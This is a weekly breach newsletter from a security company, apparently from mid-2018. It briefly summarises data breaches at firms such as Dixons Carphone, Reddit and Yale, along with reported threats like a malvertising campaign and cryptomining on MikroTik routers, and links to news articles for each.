Polyverse Weekly Breach Report

breach_report

A snapshot look at the breaches and reported vulnerabilities of last week

Dixons Carphone

The Dixons Carphone data breach was ten times larger than the company originally thought. The Personal Information of 10 million customers may have been accessed by hackers. This number is up from the original figure of 1.2 million people impacted. To read more: https://www.zdnet.com/article/dixons-carphone-data-breach-number-of-victims-rises-from-1-2m-to-10m/

Clarkson

Clarkson PLC revealed that a single user account was the base of a data breach. This breach occurred in 2017 and the hackers gained access to internal systems from May 31st until November 4th. To read more: https://www.zdnet.com/article/clarkson-says-single-user-account-to-blame-for-data-breach/

Abstractism

Valve has pulled Abstractism from its online Steam store after allegations were made that the game was exploiting players’ computers to mine cryptocurrency. The game was also accused of duplicating items from other video games and attempting to sell the fake goods at inflated prices. To read more: https://hotforsecurity.bitdefender.com/blog/steam-game-abstractism-pulled-after-cryptomining-accusations-20171.html

Pentagon

The US military is creating a list of overseas organizations that the Pentagon and its contractors should not buy software from due to security concerns. Most of these organizations are based in Russia and China. To read more: https://www.theregister.co.uk/2018/07/30/pentagon_russia_china_software_ban/

Yale

Yale University disclosed a security breach that occured a decade ago. The intrusion took place from 2008 to 2009 and affected 119,000 individuals. The breach was not uncovered until June of this year. To read more: https://www.zdnet.com/article/yale-discloses-old-school-data-breach/

Reddit

A hacker broke into a few of Reddit’s systems and accessed user data. This included current email addresses and a 2007 database backup containing old salted and hashed passwords. The attacker did not gain write access to any of Reddit systems. To read more: https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/?st=JKBEHH8G&sh=562ab497

Gorgon Group

A Pakistani hacking group is carrying out targeted attacks against various nation states. The attackers are using phishing and malware to target government organization in the UK, Spain, Russia and the US. To read more: https://www.zdnet.com/article/hacking-group-combines-spear-phishing-with-mass-malware-campaign/

UnityPoint Health

1.4 million patients may have had their information compromised in a cyberattack that gave hackers access to internal UnityPoint Health email accounts. Employees fell prey to a phishing attack and gave their email login information to the attackers. To read more: https://wcfcourier.com/news/local/cyber-attack-unitypoint-says-million-affected-in-phishing-scam/article_feccbc10-4ed4-53ff-8168-2c30091f5aa9.html

TCM Bank

A website misconfiguration on TCM Bank’s site exposed the personal information of people who applied for cards between March 2017 and mid-July 2018. TCM is a subsidiary of Washington DC based ICBA Bancard Inc, which helps community banks provide credit card options to their customers. To read more: https://krebsonsecurity.com/2018/08/credit-card-issuer-tcm-bank-leaked-applicant-data-for-16-months/

Middle Eastern Governments

A hacking group called Leafminer has attacked networks in Saudi Arabia, the UAE, Qatar, Kuwait, Bahrain, Egypt, Israel and Afghanistan. The group’s targets include the “energy, telecommunications, financial services, transportation and government” sectors. To read more: https://www.jpost.com/Israel-News/Politics-And-Diplomacy/Report-Iran-targeted-Israel-in-cyber-attack-563937

Salesforce.com

Salesforce.com is warning customers about an API error that may have leaked user data from the Marketing Cloud platform. The issue affected users of The Email Studio and Predictive Intelligence products. Salesforce.com released an update with a code change that incorrectly implemented REST API calls. To read more: https://threatpost.com/salesforce-com-warns-marketing-customers-of-data-leakage-snafu/134703/

Reported Vulnerabilities

Malvertising campaign

Security researchers at Check Point observed a malvertising campaign with over 40,000 infection attempts per week. The campaign called Master134 redirects stolen traffic from over 10,000 hacked WordPress sites and then sells the traffic to AdsTerra, a real-time bidding ad platform. To read more: https://www.theregister.co.uk/2018/07/30/malvertising_wordpress/

Symantec-chained certs

By October, Symantec-chained TLS certificates will be rejected by both Firefox and Chrome. The switch will affect 3.5 percent of the top one million sites. One major site that is among those affected by this change is PayPal. To read more: https://www.zdnet.com/article/mozilla-warns-it-plans-to-distrust-all-symantec-chained-certs-in-october/

Android Apps

Security researchers at Palo Alto Networks discovered 145 apps in the Google Play Android store that were infected by malicious Microsoft Windows executable files. The malicious code cannot however infect an Android device because to work the code needs to run on a Windows system. To read more: https://www.grahamcluley.com/android-apps-infected-windows-malware/

Bitfi

A cryptocurrency wallet, said to be “unhackable”, appears to have been hacked a week after it launched. Bitfi has offered a bounty of $250,000 for true exploits and attacks to the wallet. To read more: https://www.zdnet.com/article/unhackable-bitfi-cryptocurrency-wallet-just-got-hacked/

ISP-Grade routers

A hacking campaign compromising tens of thousands of MikroTik routers has been uncovered. The routers were hacked to embed Coinhive scripts into websites using a known vulnerability. More than 170,000 active MikroTik devices have been infected. To read more: https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/

Want to learn more?

Sign up below and receive weekly breach reports directly in your inbox.

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.